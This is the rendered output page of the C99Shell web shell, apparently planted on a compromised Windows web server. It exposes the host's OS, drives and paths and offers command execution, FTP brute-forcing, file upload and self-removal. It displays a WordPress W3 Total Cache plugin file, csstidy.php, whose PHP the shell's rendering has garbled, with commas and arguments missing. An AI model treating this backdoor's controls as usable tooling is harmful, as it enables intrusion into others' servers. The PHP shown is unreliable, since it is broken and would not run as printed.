!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\inc\options\minify\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     csstidy.php (2.13 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (!defined('W3TC')) {
    die();
}

$css_levels = array(
    
'CSS2.1',
    
'CSS2.0',
    
'CSS1.0'
);

$css_level $this->_config->get_string('minify.csstidy.options.css_level');
?>
<?php $this
->checkbox('minify.csstidy.options.remove_bslash'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.remove_bslash'?></label><br />
<?php $this->checkbox('minify.csstidy.options.compress_colors'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.compress_colors'?></label><br />
<?php $this->checkbox('minify.csstidy.options.compress_font-weight'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.compress_font-weight'?></label><br />
<?php $this->checkbox('minify.csstidy.options.lowercase_s'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.lowercase_s'?></label><br />
<?php $this->checkbox('minify.csstidy.options.remove_last_;'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.remove_last_;'?></label><br />
<?php $this->checkbox('minify.csstidy.options.sort_properties'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.sort_properties'?></label><br />
<?php $this->checkbox('minify.csstidy.options.sort_selectors'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.sort_selectors'?></label><br />
<?php $this->checkbox('minify.csstidy.options.discard_invalid_properties'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.discard_invalid_properties'?></label>
<select class="css_enabled" name="minify.csstidy.options.css_level" 
    <?php $this->sealing_disabled('minify'?>>
    <?php foreach($css_levels as $_css_level): ?>
        <option value="<?php echo esc_attr($_css_level); ?>"  <?php selected($css_level$_css_level); ?>><?php echo $_css_level?></option>
    <?php endforeach; ?>
</select><br />
<?php $this->checkbox('minify.csstidy.options.preserve_css'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.preserve_css'?></label><br />
<?php $this->checkbox('minify.csstidy.options.timestamp'false'css_'?> <?php w3_e_config_label('minify.csstidy.options.timestamp'?></label><br />

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--